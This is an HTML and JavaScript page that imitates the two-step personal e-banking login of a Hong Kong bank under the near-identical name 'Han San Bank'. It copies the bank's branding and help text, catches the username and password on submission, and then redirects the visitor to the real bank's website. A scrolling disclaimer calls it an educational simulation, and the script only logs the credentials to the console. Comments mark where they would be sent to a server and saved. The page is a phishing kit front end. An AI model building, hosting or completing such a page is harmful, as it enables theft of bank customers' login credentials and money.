<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Han San Personal e-Banking</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            background-color: #f8f8f8; /* Light grey background */
            color: #333;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }
        .disclaimer-banner-top {
            background-color: #000; /* Black background */
            color: #ff0000; /* Red text */
            font-weight: bold;
            padding: 10px 0; /* Adjusted padding for scrolling */
            text-align: center;
            font-size: 0.9em;
            border-bottom: 1px solid #ff0000; /* Red border */
            overflow: hidden; /* Hide overflowing text */
            position: relative; /* For potential advanced positioning */
            white-space: nowrap; /* Keep text on one line for scrolling */
        }

        .disclaimer-banner-top .scrolling-text {
            display: inline-block;
            /* Animation: name, duration, timing-function, delay, iteration-count, direction */
            animation: scroll-left 40s linear infinite; /* Updated from 20s to 40s */
            padding-left: 100%; /* Start off-screen to the right */
        }

        @keyframes scroll-left {
            0% {
                transform: translateX(0%);
            }
            100% {
                transform: translateX(-100%);
            }
        }

        .header {
            background-color: #fff; /* White header */
            padding: 15px 5%;
            border-bottom: 1px solid #008375; /* Han San green border */
            display: flex;
            align-items: center;
        }
        /* New CSS Logo Styles */
        .css-logo-container {
            display: flex;
            align-items: center;
        }
        .css-logo-icon {
            width: 30px; /* Adjust size as needed */
            height: 30px;
            background-color: #d92027; /* Red color similar to logo */
            border-radius: 50%; /* Makes it circular */
            margin-right: 10px;
            display: flex;
            align-items: center;
            justify-content: center;
            color: white;
            font-weight: bold;
            font-size: 1.2em; /* Adjust character size/style */
            /* For a very basic approximation of the character, you might add pseudo-elements */
            /* or a simple character. For now, I'll leave it as a plain circle or add a placeholder. */
            /* Example: content: "H"; (This is a placeholder) */
        }
        .css-logo-text {
            font-size: 1.2em; /* Adjust text size as needed */
            font-weight: bold;
            color: #333; /* Dark text color */
        }

        .logo-img {
            height: 30px; /* Adjust as needed */
        }
        .main-content {
            flex-grow: 1;
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 20px;
        }
        .login-box {
            background-color: #fff;
            padding: 30px 40px;
            border-radius: 4px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1); /* Default box-shadow for step1 */
            width: 400px; /* Default width for step1 */
            text-align: left;
            margin: 0 auto; /* Center the box for step1 */
            transition: width 0.3s ease, max-width 0.3s ease; /* Smooth transition */
        }

        /* Styles for the login box when it's step 2 (password page) */
        .login-box.login-box-step2 {
            width: auto; /* Allow width to be determined by content for step2 */
            max-width:800px; /* Max width for the entire login area in step2 */
            box-shadow: none; /* Remove box-shadow for step2 */
            margin: 0; /* Reset margin for step2, assuming .main-content centers it */
        }
        .login-box h2 {
            font-size: 1.5em;
            margin-top: 0;
            margin-bottom: 20px;
            color: #333;
        }
        .info-banner {
            background-color: #e7f3fe; /* Light blue */
            border: 1px solid #b3d7f9;
            padding: 10px;
            margin-bottom: 20px;
            font-size: 0.9em;
            border-radius: 3px;
            display: flex;
            align-items: flex-start;
        }
        .info-banner i {
            margin-right: 10px;
            color: #007bff;
        }
        .form-group {
            margin-bottom: 20px;
        }
        .form-group label {
            display: block;
            margin-bottom: 5px;
            font-weight: normal;
            font-size: 0.95em;
        }
        .form-group input[type="text"],
        .form-group input[type="password"] {
            width: calc(100% - 22px); /* Default width */
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 3px;
            font-size: 1em;
        }
        /* Specific styling for password input in step 2 */
        #step2 .password-wrapper input[type="password"],
        #step2 .password-wrapper input[type="text"] {
            width: calc(100% - 70px); /* Adjusted for the 'Show' button */
        }
        .form-group input[type="text"]:focus,
        .form-group input[type="password"]:focus {
            border-color: #008375; /* Han San green */
            outline: none;
        }
        .form-group input.error {
            border-color: #d9534f; /* Red for error */
        }
        .error-message {
            color: #d9534f; /* Red for error text */
            font-size: 0.85em;
            margin-top: 5px;
        }
        .password-wrapper {
            position: relative;
            display: flex;
            align-items: center;
        }
        .password-wrapper input[type="password"], .password-wrapper input[type="text"] {
             width: calc(100% - 70px); /* Adjust width to accommodate show button */
        }
        .show-password-btn {
            background: none;
            border: none;
            color: #007bff;
            cursor: pointer;
            font-size: 0.9em;
            padding: 10px;
            margin-left: 5px;
        }

        .btn {
            background-color: #e0e0e0; /* Grey button */
            color: #333;
            padding: 10px 20px;
            border: 1px solid #ccc;
            border-radius: 3px;
            cursor: pointer;
            font-size: 1em;
            width: auto;
            display: inline-block;
        }
        .btn-primary {
            background-color: #008375; /* Han San green */
            color: #fff;
            border-color: #008375;
        }
        .btn:disabled {
            background-color: #f0f0f0;
            color: #aaa;
            cursor: not-allowed;
            border-color: #e0e0e0;
        }
        .login-links {
            margin-top: 20px;
            font-size: 0.9em;
        }
        .login-links a {
            color: #008375; /* Han San green */
            text-decoration: none;
            display: block;
            margin-bottom: 8px;
        }
        .login-links a:hover {
            text-decoration: underline;
        }
        .footer {
            background-color: #efefef; /* Lighter grey footer */
            padding: 20px 5%;
            font-size: 0.8em;
            color: #666;
            border-top: 1px solid #ddd;
        }
        .footer-links a {
            color: #666;
            text-decoration: none;
            margin-right: 15px;
        }
        .footer-links a:hover {
            text-decoration: underline;
        }
        .footer-right {
            float: right;
        }
        .help-box {
            background-color: #f9f9f9;
            border: 1px solid #eee;
            padding: 15px;
            font-size: 0.9em;
            margin-top: 20px;
            border-radius: 3px;
        }
        .help-box h3 {
            margin-top: 0;
            font-size: 1em;
            color: #333;
        }
        .password-mask span {
            display: inline-block;
            width: 15px;
            height: 15px;
            border: 1px solid #ccc;
            margin-right: 3px;
            text-align: center;
            line-height: 15px;
        }
        /* New CSS for layout */
        .password-section-container {
            display: flex;
            gap: 20px; /* Space between password form and help box */
        }
        .password-form-container {
            flex: 1; /* Takes up available space */
        }
        .help-box {
            background-color: #f9f9f9;
            border: 1px solid #eee;
            padding: 15px;
            font-size: 0.9em;
            /* margin-top: 20px; Remove or adjust as it's now side-by-side */
            border-radius: 3px;
            flex-basis: 300px; /* Or a percentage, adjust as needed */
            align-self: flex-start; /* Aligns to the top of the flex container */
        }
        /* Simple icon placeholder */
        .icon-info::before { content: "ℹ️"; margin-right: 5px; }
        /* .icon-hsbc { float: right; margin-top: 10px; } // Removed HSBC placeholder */

    </style>
</head>
<body>
    <div class="disclaimer-banner-top">
        <div class="scrolling-text">
            Disclaimer: This is a simulated page for demonstration and educational purposes only. Do not enter real credentials. We are not affiliated with the parties in this page. Any illegal purposes based on this page are strictly prohibited.
        </div>
    </div>

    <div class="header">
        <!-- New CSS Logo -->
        <div class="css-logo-container">
            <div class="css-logo-icon">
                <!-- You can try to add a character or SVG here for closer resemblance -->
                <!-- For simplicity, it's a red circle now -->
            </div>
            <div class="css-logo-text">
                痕身銀行 Han San Bank
            </div>
        </div>
        <!-- Old Image Logo (commented out or removed) -->
        <!-- <img src="https://www.hangseng.com/content/dam/wpb/hase/images/rwd/hslogo/hase_logo_dark.svg" alt="Han San Bank Logo" class="logo-img"> -->
    </div>

    <div class="main-content">
        <div class="login-box">
            <!-- Step 1: Username Input -->
            <div id="step1">
                <h2>Log on to Han San Personal e-Banking</h2>
                <div class="info-banner">
                    <span class="icon-info"></span>
                    <div>If you log on using a mobile browser, some services may not be available. We recommend you to log on using a computer web browser, or you can download <a href="#">Han San Mobile App</a> for convenient banking.</div>
                </div>
                <form id="usernameForm">
                    <div class="form-group">
                        <label for="username">Enter your username</label>
                        <input type="text" id="username" name="username" required>
                        <div class="error-message" id="usernameError" style="display:none;">⚠️ Please enter your username</div>
                    </div>
                    <button type="button" class="btn" onclick="goToStep2()">Continue</button>
                </form>
                <div class="login-links">
                    <a href="#">Forgot your username ></a>
                    <a href="#">Haven't registered for Personal e-Banking ></a>
                </div>
            </div>

            <!-- Step 2: Password Input (Initially Hidden) -->
            <div id="step2" style="display:none;">
                <h2>Good evening <span id="greetingUser"></span></h2> <!-- Username can be inserted here -->
                <div class="password-section-container">
                    <div class="password-form-container">
                        <form id="passwordForm">
                            <div class="form-group">
                                <label for="password">Enter your password</label>
                                <div class="password-wrapper">
                                    <input type="password" id="password" name="password" required>
                                    <button type="button" class="show-password-btn" onclick="togglePasswordVisibility()">Show</button>
                                </div>
                            </div>
                            <button type="submit" class="btn btn-primary" disabled>Log on</button> <!-- Initially disabled -->
                        </form>
                        <div class="login-links">
                            <a href="#">Forgot your password ></a>
                        </div>
                    </div>
                    <div class="help-box">
                        <h3>Need help with your password?</h3>
                        <p>In the old way of log-on, we asked you to enter 3 randomly selected characters from your second password as shown below:<br>
                            <span class="password-mask"><span></span><span></span><span></span><span></span><span></span><span></span></span>
                        </p>
                        <p>With the new log-on method, you need to enter your second password in full for verification from now on.<br>
                        If you haven't set the first and second password before, you can log on directly with the password you set during registration.<br>
                        Password should be between 8-30 characters, must contain letters and numbers and is not case sensitive. If you can't remember your password, you can choose "Forgot your password" to reset.</p>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div class="footer">
        <span class="footer-links">
            <a href="#">Security Information Centre</a>
            <a href="#">System Maintenance Schedule</a>
            <a href="#">Personal e-Banking Security</a>
            <a href="#">Terms and Conditions</a>
            <a href="#">Online Important Notices</a>
        </span>
        <span class="footer-right">Member Han San Group</span>
        <br>
        <p>© Han San Bank Limited</p>
        <p>The website is intended for Hong Kong customers. <a href="#">Cross-border disclaimer</a></p>
    </div>

    <script>
        function goToStep2() {
            const usernameInput = document.getElementById('username');
            const username = usernameInput.value;
            const usernameError = document.getElementById('usernameError');
            const loginBox = document.querySelector('.login-box'); // Get the login-box element

            if (username.trim() === "") {
                usernameError.textContent = '⚠️ Please enter your username';
                usernameError.style.display = 'block';
                usernameInput.classList.add('error');
                return;
            } else if (username.trim().length < 6) {
                usernameError.textContent = '⚠️ Your username is a minimum of 6 characters long.';
                usernameError.style.display = 'block';
                usernameInput.classList.add('error');
                return;
            } else {
                usernameError.style.display = 'none';
                usernameInput.classList.remove('error');
            }
            
            // Proceed to step 2 if username is valid
            document.getElementById('step1').style.display = 'none';
            document.getElementById('step2').style.display = 'block';
            loginBox.classList.add('login-box-step2'); // Add class for step2 styling
            
            // document.getElementById('greetingUser').textContent = username; // Optional: display username
            
            // Enable Log on button once password field is typed in
            const passwordInput = document.getElementById('password');
            const logonButton = document.querySelector('#step2 .btn-primary');
            passwordInput.oninput = function() {
                if (passwordInput.value.length > 0) {
                    logonButton.disabled = false;
                } else {
                    logonButton.disabled = true;
                }
            }
        }

        function togglePasswordVisibility() {
            const passwordInput = document.getElementById('password');
            const showButton = document.querySelector('#step2 .show-password-btn');
            if (passwordInput.type === "password") {
                passwordInput.type = "text";
                showButton.textContent = "Hide";
            } else {
                passwordInput.type = "password";
                showButton.textContent = "Show";
            }
        }

        // Handle form submission (simulation - no actual data saving)
        document.getElementById('passwordForm').addEventListener('submit', function(event) {
            event.preventDefault(); // Prevent actual form submission
            const username = document.getElementById('username').value;
            const password = document.getElementById('password').value;
            
            // **Data Collection Point (Simulation)**
            // In a real application, you would send 'username' and 'password' 
            // to a backend server here (e.g., using fetch or XMLHttpRequest).
            // The backend would then save it to a file or database.
            console.log("Username:", username);
            console.log("Password:", password); // For demonstration only. NEVER log passwords in a real app.
            alert("Login attempt with Username: " + username + ".\nCheck console for data. In a real app, this would be sent to a server.");
            
            // Here you could redirect to another page or show a success/failure message
            // For example, redirect to the real Han San page after attempt:
            window.location.href = 'https://www.hangseng.com/en-hk/home/'; 
        });
    </script>

</body>
</html>